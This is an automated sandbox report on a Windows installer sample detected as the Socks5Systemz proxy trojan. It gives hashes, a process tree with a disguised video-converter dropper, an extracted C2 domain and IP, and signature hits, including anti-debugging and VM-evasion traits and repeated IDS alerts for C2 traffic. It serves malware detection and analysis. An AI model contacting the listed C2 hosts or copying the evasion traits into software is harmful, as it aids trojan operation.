Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
N6jsQ3XNNX.exe

Overview

General Information

Sample name:N6jsQ3XNNX.exe
renamed because original name is a hash value
Original sample name:46d2e28be5ad34097672b73bfa78e805.exe
Analysis ID:1528604
MD5:46d2e28be5ad34097672b73bfa78e805
SHA1:46450994830546f63d2079fddb1cd79b71584a3b
SHA256:433c601579555db1aa2f00a2188b73306c5b8907ea17ec3f901baf35796e7a31
Tags:32exeSocks5Systemztrojan
Infos:

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Machine Learning detection for dropped file
PE file has a writeable .text section
Uses known network protocols on non-standard ports
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • N6jsQ3XNNX.exe (PID: 5916 cmdline: "C:\Users\user\Desktop\N6jsQ3XNNX.exe" MD5: 46D2E28BE5AD34097672B73BFA78E805)
    • N6jsQ3XNNX.tmp (PID: 2324 cmdline: "C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp" /SL5="$203BE,4230882,54272,C:\Users\user\Desktop\N6jsQ3XNNX.exe" MD5: 16C9D19AB32C18671706CEFEE19B6949)
      • jennyvideoconverter32_64.exe (PID: 2760 cmdline: "C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe" -i MD5: 65FDD2B7C5D23EEF202604FCFEFD2FF4)
  • svchost.exe (PID: 5276 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

Threatname: Socks5Systemz

{"C2 list": ["diuzout.info"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3337175115.0000000002CD9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
    00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
      Process Memory Space: jennyvideoconverter32_64.exe PID: 2760JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Windows Processes Suspicious Parent Directory
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 5276, ProcessName: svchost.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-08T04:13:52.485360+020020494671A Network Trojan was detected192.168.2.663161185.208.158.24880TCP
        2024-10-08T04:13:55.430626+020020494671A Network Trojan was detected192.168.2.663161185.208.158.24880TCP
        2024-10-08T04:13:56.276515+020020494671A Network Trojan was detected192.168.2.663163185.208.158.24880TCP
        2024-10-08T04:13:57.075057+020020494671A Network Trojan was detected192.168.2.663165185.208.158.24880TCP
        2024-10-08T04:13:57.430314+020020494671A Network Trojan was detected192.168.2.663165185.208.158.24880TCP
        2024-10-08T04:13:58.256550+020020494671A Network Trojan was detected192.168.2.663166185.208.158.24880TCP
        2024-10-08T04:13:59.060654+020020494671A Network Trojan was detected192.168.2.663167185.208.158.24880TCP
        2024-10-08T04:13:59.411684+020020494671A Network Trojan was detected192.168.2.663167185.208.158.24880TCP
        2024-10-08T04:14:00.235449+020020494671A Network Trojan was detected192.168.2.663168185.208.158.24880TCP
        2024-10-08T04:14:00.578394+020020494671A Network Trojan was detected192.168.2.663168185.208.158.24880TCP
        2024-10-08T04:14:01.398277+020020494671A Network Trojan was detected192.168.2.663169185.208.158.24880TCP
        2024-10-08T04:14:02.218620+020020494671A Network Trojan was detected192.168.2.663170185.208.158.24880TCP
        2024-10-08T04:14:02.562916+020020494671A Network Trojan was detected192.168.2.663170185.208.158.24880TCP
        2024-10-08T04:14:02.906768+020020494671A Network Trojan was detected192.168.2.663170185.208.158.24880TCP
        2024-10-08T04:14:03.256863+020020494671A Network Trojan was detected192.168.2.663170185.208.158.24880TCP
        2024-10-08T04:14:04.056622+020020494671A Network Trojan was detected192.168.2.663171185.208.158.24880TCP
        2024-10-08T04:14:04.879972+020020494671A Network Trojan was detected192.168.2.663172185.208.158.24880TCP
        2024-10-08T04:14:05.706045+020020494671A Network Trojan was detected192.168.2.663174185.208.158.24880TCP
        2024-10-08T04:14:06.546534+020020494671A Network Trojan was detected192.168.2.663175185.208.158.24880TCP
        2024-10-08T04:14:07.381969+020020494671A Network Trojan was detected192.168.2.663176185.208.158.24880TCP
        2024-10-08T04:14:08.204252+020020494671A Network Trojan was detected192.168.2.663177185.208.158.24880TCP
        2024-10-08T04:14:09.014942+020020494671A Network Trojan was detected192.168.2.663178185.208.158.24880TCP
        2024-10-08T04:14:09.364554+020020494671A Network Trojan was detected192.168.2.663178185.208.158.24880TCP
        2024-10-08T04:14:10.181754+020020494671A Network Trojan was detected192.168.2.663179185.208.158.24880TCP
        2024-10-08T04:14:10.981526+020020494671A Network Trojan was detected192.168.2.663180185.208.158.24880TCP
        2024-10-08T04:14:11.334754+020020494671A Network Trojan was detected192.168.2.663180185.208.158.24880TCP
        2024-10-08T04:14:12.145048+020020494671A Network Trojan was detected192.168.2.663181185.208.158.24880TCP
        2024-10-08T04:14:13.116895+020020494671A Network Trojan was detected192.168.2.663182185.208.158.24880TCP
        2024-10-08T04:14:13.930977+020020494671A Network Trojan was detected192.168.2.663183185.208.158.24880TCP
        2024-10-08T04:14:14.737108+020020494671A Network Trojan was detected192.168.2.663184185.208.158.24880TCP
        2024-10-08T04:14:15.553262+020020494671A Network Trojan was detected192.168.2.663185185.208.158.24880TCP
        2024-10-08T04:14:16.375905+020020494671A Network Trojan was detected192.168.2.663186185.208.158.24880TCP
        2024-10-08T04:14:17.180272+020020494671A Network Trojan was detected192.168.2.663187185.208.158.24880TCP
        2024-10-08T04:14:18.027086+020020494671A Network Trojan was detected192.168.2.663188185.208.158.24880TCP
        2024-10-08T04:14:18.857959+020020494671A Network Trojan was detected192.168.2.663189185.208.158.24880TCP
        2024-10-08T04:14:19.213242+020020494671A Network Trojan was detected192.168.2.663189185.208.158.24880TCP
        2024-10-08T04:14:20.022955+020020494671A Network Trojan was detected192.168.2.663190185.208.158.24880TCP
        2024-10-08T04:14:20.839054+020020494671A Network Trojan was detected192.168.2.663191185.208.158.24880TCP
        2024-10-08T04:14:21.653769+020020494671A Network Trojan was detected192.168.2.663192185.208.158.24880TCP
        2024-10-08T04:14:22.003080+020020494671A Network Trojan was detected192.168.2.663192185.208.158.24880TCP
        2024-10-08T04:14:22.835901+020020494671A Network Trojan was detected192.168.2.663193185.208.158.24880TCP
        2024-10-08T04:14:23.663046+020020494671A Network Trojan was detected192.168.2.663194185.208.158.24880TCP
        2024-10-08T04:14:24.482027+020020494671A Network Trojan was detected192.168.2.663197185.208.158.24880TCP
        2024-10-08T04:14:24.831303+020020494671A Network Trojan was detected192.168.2.663197185.208.158.24880TCP
        2024-10-08T04:14:25.643422+020020494671A Network Trojan was detected192.168.2.663198185.208.158.24880TCP
        2024-10-08T04:14:26.470695+020020494671A Network Trojan was detected192.168.2.663199185.208.158.24880TCP
        2024-10-08T04:14:27.282637+020020494671A Network Trojan was detected192.168.2.663200185.208.158.24880TCP
        2024-10-08T04:14:28.102266+020020494671A Network Trojan was detected192.168.2.663201185.208.158.24880TCP
        2024-10-08T04:14:29.224418+020020494671A Network Trojan was detected192.168.2.663202185.208.158.24880TCP
        2024-10-08T04:14:30.061625+020020494671A Network Trojan was detected192.168.2.663203185.208.158.24880TCP
        2024-10-08T04:14:30.418069+020020494671A Network Trojan was detected192.168.2.663203185.208.158.24880TCP
        2024-10-08T04:14:31.234585+020020494671A Network Trojan was detected192.168.2.663204185.208.158.24880TCP
        2024-10-08T04:14:31.579465+020020494671A Network Trojan was detected192.168.2.663204185.208.158.24880TCP
        2024-10-08T04:14:32.416312+020020494671A Network Trojan was detected192.168.2.663205185.208.158.24880TCP
        2024-10-08T04:14:33.254525+020020494671A Network Trojan was detected192.168.2.663206185.208.158.24880TCP
        2024-10-08T04:14:34.223810+020020494671A Network Trojan was detected192.168.2.663207185.208.158.24880TCP
        2024-10-08T04:14:35.057170+020020494671A Network Trojan was detected192.168.2.663208185.208.158.24880TCP
        2024-10-08T04:14:35.885964+020020494671A Network Trojan was detected192.168.2.663209185.208.158.24880TCP
        2024-10-08T04:14:36.696717+020020494671A Network Trojan was detected192.168.2.663210185.208.158.24880TCP
        2024-10-08T04:14:37.500804+020020494671A Network Trojan was detected192.168.2.663211185.208.158.24880TCP
        2024-10-08T04:14:37.843985+020020494671A Network Trojan was detected192.168.2.663211185.208.158.24880TCP
        2024-10-08T04:14:38.666724+020020494671A Network Trojan was detected192.168.2.663213185.208.158.24880TCP
        2024-10-08T04:14:39.488680+020020494671A Network Trojan was detected192.168.2.663214185.208.158.24880TCP
        2024-10-08T04:14:40.324704+020020494671A Network Trojan was detected192.168.2.663215185.208.158.24880TCP
        2024-10-08T04:14:40.675579+020020494671A Network Trojan was detected192.168.2.663215185.208.158.24880TCP
        2024-10-08T04:14:41.513567+020020494671A Network Trojan was detected192.168.2.663216185.208.158.24880TCP
        2024-10-08T04:14:41.861032+020020494671A Network Trojan was detected192.168.2.663216185.208.158.24880TCP
        2024-10-08T04:14:42.705424+020020494671A Network Trojan was detected192.168.2.663217185.208.158.24880TCP
        2024-10-08T04:14:43.540491+020020494671A Network Trojan was detected192.168.2.663218185.208.158.24880TCP
        2024-10-08T04:14:44.378094+020020494671A Network Trojan was detected192.168.2.663219185.208.158.24880TCP
        2024-10-08T04:14:45.232632+020020494671A Network Trojan was detected192.168.2.663220185.208.158.24880TCP
        2024-10-08T04:14:45.583772+020020494671A Network Trojan was detected192.168.2.663220185.208.158.24880TCP
        2024-10-08T04:14:46.404938+020020494671A Network Trojan was detected192.168.2.663221185.208.158.24880TCP
        2024-10-08T04:14:46.750961+020020494671A Network Trojan was detected192.168.2.663221185.208.158.24880TCP
        2024-10-08T04:14:47.566653+020020494671A Network Trojan was detected192.168.2.663222185.208.158.24880TCP
        2024-10-08T04:14:48.435341+020020494671A Network Trojan was detected192.168.2.663223185.208.158.24880TCP
        2024-10-08T04:14:48.785107+020020494671A Network Trojan was detected192.168.2.663223185.208.158.24880TCP
        2024-10-08T04:14:49.610149+020020494671A Network Trojan was detected192.168.2.663224185.208.158.24880TCP
        2024-10-08T04:14:49.956149+020020494671A Network Trojan was detected192.168.2.663224185.208.158.24880TCP
        2024-10-08T04:14:50.773595+020020494671A Network Trojan was detected192.168.2.663225185.208.158.24880TCP
        2024-10-08T04:14:51.590209+020020494671A Network Trojan was detected192.168.2.663226185.208.158.24880TCP
        2024-10-08T04:14:51.936933+020020494671A Network Trojan was detected192.168.2.663226185.208.158.24880TCP
        2024-10-08T04:14:52.757844+020020494671A Network Trojan was detected192.168.2.663227185.208.158.24880TCP
        2024-10-08T04:14:53.600074+020020494671A Network Trojan was detected192.168.2.663228185.208.158.24880TCP
        2024-10-08T04:14:54.413726+020020494671A Network Trojan was detected192.168.2.663229185.208.158.24880TCP
        2024-10-08T04:14:55.227231+020020494671A Network Trojan was detected192.168.2.663230185.208.158.24880TCP
        2024-10-08T04:14:56.066016+020020494671A Network Trojan was detected192.168.2.663231185.208.158.24880TCP
        2024-10-08T04:14:56.908568+020020494671A Network Trojan was detected192.168.2.663232185.208.158.24880TCP
        2024-10-08T04:14:57.773482+020020494671A Network Trojan was detected192.168.2.663233185.208.158.24880TCP
        2024-10-08T04:14:58.597301+020020494671A Network Trojan was detected192.168.2.663234185.208.158.24880TCP
        2024-10-08T04:14:59.420311+020020494671A Network Trojan was detected192.168.2.663235185.208.158.24880TCP
        2024-10-08T04:15:00.249206+020020494671A Network Trojan was detected192.168.2.663236185.208.158.24880TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for dropped file
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeAvira: detection malicious, Label: HEUR/AGEN.1329998
        Source: C:\ProgramData\ET Ammeter Side 10.7.45\ET Ammeter Side 10.7.45.exeAvira: detection malicious, Label: HEUR/AGEN.1329998
        Found malware configuration
        Source: jennyvideoconverter32_64.exe.2760.3.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["diuzout.info"]}
        Multi AV Scanner detection for dropped file
        Source: C:\ProgramData\ET Ammeter Side 10.7.45\ET Ammeter Side 10.7.45.exeVirustotal: Detection: 36%Perma Link
        Multi AV Scanner detection for submitted file
        Source: N6jsQ3XNNX.exeVirustotal: Detection: 27%Perma Link
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeJoe Sandbox ML: detected
        Source: C:\ProgramData\ET Ammeter Side 10.7.45\ET Ammeter Side 10.7.45.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0045D4EC GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,2_2_0045D4EC
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0045D5A0 ArcFourCrypt,2_2_0045D5A0
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0045D5B8 ArcFourCrypt,2_2_0045D5B8
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_10001000 ISCryptGetVersion,2_2_10001000
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_10001130 ArcFourCrypt,2_2_10001130

        Compliance

        barindex
        Detected unpacking (overwrites its own PE header)
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeUnpacked PE file: 3.2.jennyvideoconverter32_64.exe.400000.0.unpack
        Source: N6jsQ3XNNX.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Jenny Video Converter_is1Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00452A4C FindFirstFileA,GetLastError,2_2_00452A4C
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004751F8 FindFirstFileA,FindNextFileA,FindClose,2_2_004751F8
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,2_2_00464048
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,2_2_004644C4
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00462ABC FindFirstFileA,FindNextFileA,FindClose,2_2_00462ABC
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,2_2_00497A74

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63170 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63168 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63201 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63165 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63166 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63181 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63175 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63199 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63161 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63184 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63176 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63189 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63219 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63177 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63217 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63183 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63197 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63171 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63204 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63236 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63169 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63207 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63223 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63163 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63192 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63218 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63200 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63205 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63230 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63193 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63206 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63225 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63174 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63234 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63187 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63210 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63167 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63232 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63228 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63178 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63180 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63231 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63179 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63202 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63191 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63185 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63172 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63182 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63224 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63203 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63211 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63216 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63208 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63209 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63229 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63194 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63227 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63186 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63198 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63220 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63235 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63214 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63213 -> 185.208.158.248:80
